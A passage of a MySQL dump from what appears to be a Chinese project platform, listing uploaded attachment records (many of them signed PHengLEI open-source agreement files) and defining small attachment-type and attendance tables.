09:41:52',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1415,95,'ApplySignature','ceshi.jpg','f317e3fe638cdf19acad8d42166ca011_1614734125520.jpg',17668,'image/jpeg','f317e3fe638cdf19acad8d42166ca011_1614734125520',0,128,'2021-03-03 01:15:25',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1416,NULL,NULL,'图片.png','6a5b64b2763848c4908469fa949f12f7_1614740111442.png',32300,'image/png','6a5b64b2763848c4908469fa949f12f7_1614740111442',1,46,'2021-03-03 02:55:11',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1417,NULL,NULL,'图片.png','f208034849e7a813570475b6cb3a1850_1614740122104.png',45925,'image/png','f208034849e7a813570475b6cb3a1850_1614740122104',1,46,'2021-03-03 02:55:22',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1418,NULL,NULL,'图片.png','e13283052925a39f04a83ee8ece8ca92_1614740183167.png',29726,'image/png','e13283052925a39f04a83ee8ece8ca92_1614740183167',1,46,'2021-03-03 02:56:23',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1419,NULL,NULL,'图片.png','761686aaa85d84592b66756f9bb87618_1614740234110.png',13518,'image/png','761686aaa85d84592b66756f9bb87618_1614740234110',1,46,'2021-03-03 02:57:14',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1420,NULL,NULL,'image.png','fcab6e6914e5037cac11d5416f677215_1614740436296.png',29967,'image/png','fcab6e6914e5037cac11d5416f677215_1614740436296',2,181,'2021-03-03 03:00:36',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1421,NULL,NULL,'image.png','fcab6e6914e5037cac11d5416f677215_1614740604379.png',29967,'image/png','fcab6e6914e5037cac11d5416f677215_1614740604379',1,181,'2021-03-03 03:03:24',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1422,NULL,NULL,'image.png','29123ed47f7300c4ebe047317d90f92b_1614740718395.png',25069,'image/png','29123ed47f7300c4ebe047317d90f92b_1614740718395',1,181,'2021-03-03 03:05:18',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1423,NULL,NULL,'image.png','48be863b5897a9fc937fd2dae9cb3d74_1614740784007.png',11523,'image/png','48be863b5897a9fc937fd2dae9cb3d74_1614740784007',2,181,'2021-03-03 03:06:24',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1424,NULL,NULL,'image.png','37df3706f46c089d92e7183146f4bbf4_1614740800095.png',60447,'image/png','37df3706f46c089d92e7183146f4bbf4_1614740800095',2,181,'2021-03-03 03:06:40',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1425,NULL,NULL,'image.png','d89522eb723418f2e516a3b64939ce2e_1614740881115.png',37949,'image/png','d89522eb723418f2e516a3b64939ce2e_1614740881115',1,181,'2021-03-03 03:08:01',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1426,NULL,NULL,'404.PNG','36dc4430ff831264dfbec146f8849ee3_1614741330930.PNG',214759,'image/png','36dc4430ff831264dfbec146f8849ee3_1614741330930',3,46,'2021-03-03 03:15:30',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1427,NULL,NULL,'image.png','50d1606f8347d282aba83190fa855a4a_1614753877941.png',67279,'image/png','50d1606f8347d282aba83190fa855a4a_1614753877941',3,49,'2021-03-03 06:44:37',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1428,NULL,NULL,'image.png','087b2536de9a0f678cb12ecef4908397_1614753905342.png',20927,'image/png','087b2536de9a0f678cb12ecef4908397_1614753905342',1,49,'2021-03-03 06:45:05',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1429,NULL,NULL,'开源项目的消息显示与其他的不同01.PNG','2bb4277e99c2e973faead82b940c8980_1614753988748.PNG',356239,'image/png','2bb4277e99c2e973faead82b940c8980_1614753988748',2,46,'2021-03-03 06:46:28',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1430,NULL,NULL,'image.png','087b2536de9a0f678cb12ecef4908397_1614754003037.png',20927,'image/png','087b2536de9a0f678cb12ecef4908397_1614754003037',5,49,'2021-03-03 06:46:43',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1431,NULL,NULL,'image.png','104587f38e3ac474317fd81ece41aa19_1614754019395.png',53686,'image/png','104587f38e3ac474317fd81ece41aa19_1614754019395',2,49,'2021-03-03 06:46:59',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1432,NULL,NULL,'开源项目的消息显示与其他的不同02.PNG','a1d76bc9975fefdfe64fa1ba3c086ad0_1614754038718.PNG',195794,'image/png','a1d76bc9975fefdfe64fa1ba3c086ad0_1614754038718',2,46,'2021-03-03 06:47:18',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1433,NULL,NULL,'image.png','cc4f30e13f0e4fe236a0d47ba50e32ff_1614754066953.png',43695,'image/png','cc4f30e13f0e4fe236a0d47ba50e32ff_1614754066953',3,49,'2021-03-03 06:47:46',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1434,NULL,NULL,'image.png','da2684a6303ed974977ff404c09646eb_1614754436900.png',77586,'image/png','da2684a6303ed974977ff404c09646eb_1614754436900',2,49,'2021-03-03 06:53:56',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1435,NULL,NULL,'image.png','da2684a6303ed974977ff404c09646eb_1614754438048.png',77586,'image/png','da2684a6303ed974977ff404c09646eb_1614754438048',1,49,'2021-03-03 06:53:58',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1436,NULL,NULL,'image.png','7f87d285c26bc985bfa2d8e1115ff915_1614754475868.png',63641,'image/png','7f87d285c26bc985bfa2d8e1115ff915_1614754475868',3,49,'2021-03-03 06:54:35',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1437,NULL,NULL,'image.png','f29465b4ad8b21644a62715d006f52f6_1614754527549.png',50103,'image/png','f29465b4ad8b21644a62715d006f52f6_1614754527549',3,49,'2021-03-03 06:55:27',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1438,NULL,NULL,'image.png','b3dacd9c4e4b0b8db7a2e01790aff4ab_1614754583396.png',70231,'image/png','b3dacd9c4e4b0b8db7a2e01790aff4ab_1614754583396',2,49,'2021-03-03 06:56:23',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1439,NULL,NULL,'image.png','94b1ba1330b237f737f1408521ceb6b7_1614754850687.png',35438,'image/png','94b1ba1330b237f737f1408521ceb6b7_1614754850687',2,49,'2021-03-03 07:00:50',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1440,NULL,NULL,'image.png','f1b3f5dadfd60a39470da7e98065ccf4_1614754867215.png',102487,'image/png','f1b3f5dadfd60a39470da7e98065ccf4_1614754867215',2,49,'2021-03-03 07:01:07',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1441,NULL,NULL,'image.png','e90f497d9d2cc90c9096b34741420968_1614754882570.png',46219,'image/png','e90f497d9d2cc90c9096b34741420968_1614754882570',2,49,'2021-03-03 07:01:22',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1442,NULL,NULL,'image.png','d12ba145ea1f1db400b5a792ee9bff42_1614754886701.png',33518,'image/png','d12ba145ea1f1db400b5a792ee9bff42_1614754886701',2,49,'2021-03-03 07:01:26',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1443,NULL,NULL,'image.png','2a82720f137bb5fbde37b9f4e64ae33b_1614755157154.png',69255,'image/png','2a82720f137bb5fbde37b9f4e64ae33b_1614755157154',2,49,'2021-03-03 07:05:57',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1449,96,'ApplySignature','PHengLEI软件开源协议.docx','6428f6cad04ba67d5ec14c147664affc_1614824848612.docx',407684,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','6428f6cad04ba67d5ec14c147664affc_1614824848612',1,194,'2021-03-04 02:27:28',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1450,NULL,NULL,'ceshi.jpg','f317e3fe638cdf19acad8d42166ca011_1614825000042.jpg',17668,'image/jpeg','f317e3fe638cdf19acad8d42166ca011_1614825000042',0,128,'2021-03-04 02:30:00',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1451,NULL,NULL,'ceshi.jpg','f317e3fe638cdf19acad8d42166ca011_1614825006737.jpg',17668,'image/jpeg','f317e3fe638cdf19acad8d42166ca011_1614825006737',0,128,'2021-03-04 02:30:06',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1452,97,'ApplySignature','风雷软件申请协议.docx','6422bf8e1e6413de7475e3971b724185_1614826243820.docx',876800,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','6422bf8e1e6413de7475e3971b724185_1614826243820',1,173,'2021-03-04 02:50:43',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1453,NULL,NULL,'关注\"程序员面试现场\"获取更多壁纸8.jpeg','0bf95b9203fe45ab8d5e7266647fa3f9_1614827666012.jpeg',476908,'image/jpeg','0bf95b9203fe45ab8d5e7266647fa3f9_1614827666012',0,48,'2021-03-04 03:14:26',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1454,NULL,NULL,'image.png','02ba3efffcae36011ddb0e4a6247f8d2_1614828459096.png',179223,'image/png','02ba3efffcae36011ddb0e4a6247f8d2_1614828459096',5,49,'2021-03-04 03:27:39',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1455,NULL,NULL,'https___www.lifeofpix.com_wp-content_uploads_2020_12_DSC00528-2.jpg','0e5c76a0830f0e2d84e94dfd2856ca32_1614829268971.jpg',4332034,'image/jpeg','0e5c76a0830f0e2d84e94dfd2856ca32_1614829268971',0,48,'2021-03-04 03:41:09',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1456,NULL,NULL,'rspec.pdf','f96237f939348b64db80e9b1e769d3d3_1614829302578.pdf',2620558,'application/pdf','f96237f939348b64db80e9b1e769d3d3_1614829302578',0,128,'2021-03-04 03:41:42',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1457,NULL,NULL,'rspec.pdf','f96237f939348b64db80e9b1e769d3d3_1614829593454.pdf',2620558,'application/pdf','f96237f939348b64db80e9b1e769d3d3_1614829593454',0,128,'2021-03-04 03:46:33',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1458,NULL,NULL,'BaiduNetdisk_mac_3.6.5.dmg','5eb7d3ed65d8a6ee161772d881106013_1614829714362.dmg',123799499,'application/x-apple-diskimage','5eb7d3ed65d8a6ee161772d881106013_1614829714362',0,128,'2021-03-04 03:48:34',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1459,98,'ApplySignature','风雷软件开源协议.jpg','223c01d75c940228a44a4e5e6ae49a82_1614829845890.jpg',1851120,'image/jpeg','223c01d75c940228a44a4e5e6ae49a82_1614829845890',2,192,'2021-03-04 03:50:45',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1461,NULL,NULL,'学历证书.jpg','0a65dc3c7868221f68dd92674eb2828f_1614840365609.jpg',1951961,'image/jpeg','0a65dc3c7868221f68dd92674eb2828f_1614840365609',0,49,'2021-03-04 06:46:05',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1462,NULL,NULL,'image.png','829fe2ced847034c922b9b42bb436a23_1614841847236.png',342351,'image/png','829fe2ced847034c922b9b42bb436a23_1614841847236',10,49,'2021-03-04 07:10:47',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1463,NULL,NULL,'image.png','392e053e2a1d54aebafd052845d6ff99_1614841855275.png',79204,'image/png','392e053e2a1d54aebafd052845d6ff99_1614841855275',10,49,'2021-03-04 07:10:55',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1464,NULL,NULL,'image.png','c0f0330e01779c1ad342db5e1dc0b634_1614842184430.png',32723,'image/png','c0f0330e01779c1ad342db5e1dc0b634_1614842184430',6,49,'2021-03-04 07:16:24',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1465,NULL,NULL,'image.png','3d93729f1249f6ed5a75fcf1f1c80611_1614842196885.png',75162,'image/png','3d93729f1249f6ed5a75fcf1f1c80611_1614842196885',6,49,'2021-03-04 07:16:36',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1466,100,'ApplySignature','插图.png','e6031feb1b8285a31c950606049a541d_1614842636574.png',93691,'image/png','e6031feb1b8285a31c950606049a541d_1614842636574',2,133,'2021-03-04 07:23:56',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1467,101,'ApplySignature','PHengLEI软件开源协议.pdf','aadd5563a2ff1b0b175996135daf5e71_1614843607678.pdf',389946,'application/pdf','aadd5563a2ff1b0b175996135daf5e71_1614843607678',0,187,'2021-03-04 07:40:07',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1468,102,'ApplySignature','协议.jpg','d55df202526fb27c8c2ace1cfc42617d_1614906265200.jpg',2819279,'image/jpeg','d55df202526fb27c8c2ace1cfc42617d_1614906265200',0,191,'2021-03-05 01:04:25',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1469,103,'ApplySignature','PHengLEI.pdf','8a1c44ce9be742f0d0dfd7536b88e7c1_1614906286403.pdf',696117,'application/pdf','8a1c44ce9be742f0d0dfd7536b88e7c1_1614906286403',0,165,'2021-03-05 01:04:46',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1470,104,'ApplySignature','rspec.pdf','f96237f939348b64db80e9b1e769d3d3_1614906716610.pdf',2620558,'application/pdf','f96237f939348b64db80e9b1e769d3d3_1614906716610',0,128,'2021-03-05 01:11:56',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1471,NULL,NULL,'image.png','db6efec7a6777fe5a2cffd3c4cce7627_1614907741318.png',214198,'image/png','db6efec7a6777fe5a2cffd3c4cce7627_1614907741318',5,49,'2021-03-05 01:29:01',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1472,NULL,NULL,'image.png','2ea9bd8a1c47ba07a852002e11ae0787_1614908291521.png',127666,'image/png','2ea9bd8a1c47ba07a852002e11ae0787_1614908291521',8,49,'2021-03-05 01:38:11',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1473,NULL,NULL,'image.png','fd0d4f4e784fd1780be4c1bc84ee0e5b_1614909419841.png',176721,'image/png','fd0d4f4e784fd1780be4c1bc84ee0e5b_1614909419841',6,49,'2021-03-05 01:56:59',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1474,105,'ApplySignature','国家数值风洞“风雷(PHengLEI)”软件开源协议.jpg','04b2eda3338eee331154db3be253905f_1614953201947.jpg',4351865,'image/jpeg','04b2eda3338eee331154db3be253905f_1614953201947',1,206,'2021-03-05 14:06:41',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1475,106,'ApplySignature','PHengLEI软件开源协议.pdf','1d715dfba4e5a6dde3f1ae6bc1fb32ac_1615019265905.pdf',442056,'application/pdf','1d715dfba4e5a6dde3f1ae6bc1fb32ac_1615019265905',0,175,'2021-03-06 08:27:45',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1476,107,'ApplySignature','申请表.pdf','e8b509bf7d78c82f8050fced3b00bb19_1615019872183.pdf',384092,'application/pdf','e8b509bf7d78c82f8050fced3b00bb19_1615019872183',0,179,'2021-03-06 08:37:52',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1477,108,'ApplySignature','签署协议.pdf','c19a78a890dbe1e7ee8350b81142e0d1_1615022535624.pdf',303034,'application/pdf','c19a78a890dbe1e7ee8350b81142e0d1_1615022535624',1,207,'2021-03-06 09:22:15',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1478,109,'ApplySignature','风雷协议_高宜胜_20201211.pdf','bb83b7461038294c5646c14cfbc2c45e_1615025465043.pdf',1243313,'application/pdf','bb83b7461038294c5646c14cfbc2c45e_1615025465043',0,189,'2021-03-06 10:11:05',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1479,110,'ApplySignature','国家数值风洞风雷软件开源协议_东南大学张寒.pdf','35b69abdf348625958aa9a077edd4082_1615090313404.pdf',597255,'application/pdf','35b69abdf348625958aa9a077edd4082_1615090313404',0,208,'2021-03-07 04:11:53',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1480,111,'ApplySignature','风雷软件申请-倪明-南方科技大学.pdf','da4bb9eb8c7ab5e3c4985a3ae50f6249_1615130653927.pdf',3657342,'application/pdf','da4bb9eb8c7ab5e3c4985a3ae50f6249_1615130653927',1,211,'2021-03-07 15:24:13',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1481,112,'ApplySignature','国家数值风洞风雷软件开源协议_东南大学张寒.pdf','35b69abdf348625958aa9a077edd4082_1615167754354.pdf',597255,'application/pdf','35b69abdf348625958aa9a077edd4082_1615167754354',0,208,'2021-03-08 01:42:34',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1482,117,'ApplySignature','国家数值风洞风雷软件开源协议_东南大学张寒.pdf','35b69abdf348625958aa9a077edd4082_1615180406846.pdf',597255,'application/pdf','35b69abdf348625958aa9a077edd4082_1615180406846',0,208,'2021-03-08 05:13:26',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1483,NULL,NULL,'image.png','319e3ff9a2efc6f80cda6a7d8b764eb2_1615186118149.png',310106,'image/png','319e3ff9a2efc6f80cda6a7d8b764eb2_1615186118149',5,1,'2021-03-08 06:48:38',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1484,NULL,NULL,'image.png','36d8d8b356c8452f163e517b5e1fcd8f_1615186161649.png',83578,'image/png','36d8d8b356c8452f163e517b5e1fcd8f_1615186161649',6,1,'2021-03-08 06:49:21',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1485,NULL,NULL,'image.png','3dc73ff095671cb82c3e8391331bdfb7_1615186167309.png',54147,'image/png','3dc73ff095671cb82c3e8391331bdfb7_1615186167309',6,1,'2021-03-08 06:49:27',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1487,118,'ApplySignature','PHengLEI申请_small.pdf','c3ea545624bdf0aba42d504aff4676bd_1615277440709.pdf',277388,'application/pdf','c3ea545624bdf0aba42d504aff4676bd_1615277440709',0,212,'2021-03-09 08:10:40',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1488,119,'ApplySignature','协议.docx','25c7ec3d2d40eacadc37b292f6e4fd7c_1615278377536.docx',482711,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','25c7ec3d2d40eacadc37b292f6e4fd7c_1615278377536',0,190,'2021-03-09 08:26:17',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1489,121,'ApplySignature','谢玮-PHengLEI软件开源协议.pdf','fa426eb8f236e7349b7db81ba31446f1_1615279736298.pdf',529172,'application/pdf','fa426eb8f236e7349b7db81ba31446f1_1615279736298',0,214,'2021-03-09 08:48:56',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1490,128,'ApplySignature','谢玮-PHengLEI软件开源协议.pdf','fa426eb8f236e7349b7db81ba31446f1_1615279782310.pdf',529172,'application/pdf','fa426eb8f236e7349b7db81ba31446f1_1615279782310',0,214,'2021-03-09 08:49:42',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1491,129,'ApplySignature','风雷开源协议.jpg','89d22f004f2dbf0138f7d8bf5005f590_1615298442358.jpg',3993752,'image/jpeg','89d22f004f2dbf0138f7d8bf5005f590_1615298442358',0,215,'2021-03-09 14:00:42',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1492,NULL,NULL,'image.png','c19f488187d9da00fa58e646896196f7_1615361511053.png',349705,'image/png','c19f488187d9da00fa58e646896196f7_1615361511053',5,49,'2021-03-10 07:31:51',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1493,NULL,NULL,'image.png','84923dc178d63439093c7b7e2afadcea_1615361909611.png',340048,'image/png','84923dc178d63439093c7b7e2afadcea_1615361909611',2,49,'2021-03-10 07:38:29',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1494,NULL,NULL,'f978fb456743a662750b9ba71d045ca5','210310170428_f978fb456743a662750b9ba71d045ca5',60152,'image/png','302e3c55efd465a336f1b07879d7ab45',0,50,'2021-03-10 17:04:28',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1495,NULL,NULL,'47528cbceb8684c523665fbada6a9a8d','210310170433_47528cbceb8684c523665fbada6a9a8d',84626,'image/png','d2c74fa2fd131c32a1e20bb1ec97589a',0,50,'2021-03-10 17:04:33',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1496,NULL,NULL,'1f33fdbbd3f949e19b82fe2b324dcd6c','210310170445_1f33fdbbd3f949e19b82fe2b324dcd6c',84626,'image/png','d2c74fa2fd131c32a1e20bb1ec97589a',0,50,'2021-03-10 17:04:45',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1497,NULL,NULL,'e852ac156a4310daea16c8772ec4476f','210310170540_e852ac156a4310daea16c8772ec4476f',174383,'image/png','115bb976eb7cd1719c26a91b79cbad0f',1,50,'2021-03-10 17:05:40',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1498,NULL,NULL,'3c6e4342c7cadd42b6fa9a23c33b2eac','210310170559_3c6e4342c7cadd42b6fa9a23c33b2eac',84626,'image/png','d2c74fa2fd131c32a1e20bb1ec97589a',0,50,'2021-03-10 17:05:59',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1499,NULL,NULL,'1c8e38e811d0a1b5300d88c94c4bdbaf','210310170603_1c8e38e811d0a1b5300d88c94c4bdbaf',84626,'image/png','d2c74fa2fd131c32a1e20bb1ec97589a',0,50,'2021-03-10 17:06:03',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1500,NULL,NULL,'1f06ca7c5af55e79d81b01b73c491f89','210310170604_1f06ca7c5af55e79d81b01b73c491f89',84626,'image/png','d2c74fa2fd131c32a1e20bb1ec97589a',0,50,'2021-03-10 17:06:04',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1501,NULL,NULL,'d554c8a1600473501632db6b55386f3b','210310170631_d554c8a1600473501632db6b55386f3b',354876,'image/png','b3e9bfdcbb2a9e8aff0e3c6c869ad173',0,50,'2021-03-10 17:06:31',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1502,NULL,NULL,'35f6744b8077b0b0a683fcd14169a0f2','210310170633_35f6744b8077b0b0a683fcd14169a0f2',354876,'image/png','b3e9bfdcbb2a9e8aff0e3c6c869ad173',0,50,'2021-03-10 17:06:33',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1503,NULL,NULL,'c934d665888f2c530bcdbb5ff1180463','210310170634_c934d665888f2c530bcdbb5ff1180463',354876,'image/png','b3e9bfdcbb2a9e8aff0e3c6c869ad173',0,50,'2021-03-10 17:06:34',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1504,NULL,NULL,'d109a035d6e6a399f0a8b393821b0a62','210310170829_d109a035d6e6a399f0a8b393821b0a62',233805,'image/png','9f4c94b518c19921713bb073c815717f',1,50,'2021-03-10 17:08:29',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1505,NULL,NULL,'734c6b700a7138e9bd1fc61f59b067e5','210310171216_734c6b700a7138e9bd1fc61f59b067e5',48410,'image/png','918c4992035d84d991d24e37b8c31cf7',0,50,'2021-03-10 17:12:16',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1506,NULL,NULL,'205cda7048120864ee12928898eca552','210310171218_205cda7048120864ee12928898eca552',48410,'image/png','918c4992035d84d991d24e37b8c31cf7',0,50,'2021-03-10 17:12:18',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1507,NULL,NULL,'58439a421fb4ed1196a9b6bf2daeaae2','210310171221_58439a421fb4ed1196a9b6bf2daeaae2',48410,'image/png','918c4992035d84d991d24e37b8c31cf7',0,50,'2021-03-10 17:12:21',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1508,NULL,NULL,'e0c7c9fa854617e150050cb71d19c3bd','210310171254_e0c7c9fa854617e150050cb71d19c3bd',86111,'image/png','db90b37be51190585484283b5c124ddb',0,50,'2021-03-10 17:12:54',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1509,NULL,NULL,'08d29bafe9a1ec0609fa4493af267dbc','210310171301_08d29bafe9a1ec0609fa4493af267dbc',86111,'image/png','db90b37be51190585484283b5c124ddb',0,50,'2021-03-10 17:13:01',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1510,NULL,NULL,'1e51841fbf6e31220acb81691f885ce4','210310171302_1e51841fbf6e31220acb81691f885ce4',86111,'image/png','db90b37be51190585484283b5c124ddb',0,50,'2021-03-10 17:13:02',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1511,NULL,NULL,'ed609e05eeeac84a6c0edbde26f7e135','210310171302_ed609e05eeeac84a6c0edbde26f7e135',86111,'image/png','db90b37be51190585484283b5c124ddb',0,50,'2021-03-10 17:13:02',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1512,131,'ApplySignature','PHengLEI软件开源协议.pdf','6663c0a8c222ee1954e4b8f09ce37f6c_1615370766489.pdf',100297,'application/pdf','6663c0a8c222ee1954e4b8f09ce37f6c_1615370766489',0,216,'2021-03-10 10:06:06',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1514,132,'ApplySignature','QQ图片20201211165919.zip','ae9d7e5cc81f861b5e23d7567b74ff42_1615417985761.zip',1952813,'application/x-zip-compressed','ae9d7e5cc81f861b5e23d7567b74ff42_1615417985761',0,217,'2021-03-10 23:13:05',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1515,25,'Competition','b12c9f3af95957fecbb1ec9d5ff28585.jpg','210311094058_b12c9f3af95957fecbb1ec9d5ff28585.jpg',8023,'','f23e5bab0727aab4da622521c15abaaa',1,1,'2021-03-11 09:40:58',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1520,NULL,NULL,'99be1e1d18bbe259e76c26fdb1d07ff4','',0,'','',0,50,'2021-03-11 10:47:17',NULL,NULL,1,1,NULL,NULL,1,NULL,0,0,NULL),(1524,133,'ApplySignature','QQ图片20201211165919.zip','ae9d7e5cc81f861b5e23d7567b74ff42_1615443399767.zip',1952813,'application/x-zip-compressed','ae9d7e5cc81f861b5e23d7567b74ff42_1615443399767',0,217,'2021-03-11 06:16:39',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1525,134,'ApplySignature','空.txt','d41d8cd98f00b204e9800998ecf8427e_1615446690819.txt',0,'text/plain','d41d8cd98f00b204e9800998ecf8427e_1615446690819',0,218,'2021-03-11 07:11:30',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL);
|
||
/*!40000 ALTER TABLE `attachments` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `attachmentstypes`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `attachmentstypes`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `attachmentstypes` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`typeId` int(11) NOT NULL,
|
||
`typeName` varchar(50) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `attachmentstypes`
|
||
--
|
||
|
||
LOCK TABLES `attachmentstypes` WRITE;
|
||
/*!40000 ALTER TABLE `attachmentstypes` DISABLE KEYS */;
|
||
INSERT INTO `attachmentstypes` VALUES (1,1,'源代码'),(2,1,'课件'),(3,1,'研究报告'),(4,2,'源代码'),(5,2,'课件'),(6,2,'研究报告'),(7,3,'修订附件');
|
||
/*!40000 ALTER TABLE `attachmentstypes` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `attendances`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `attendances`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `attendances` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`score` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
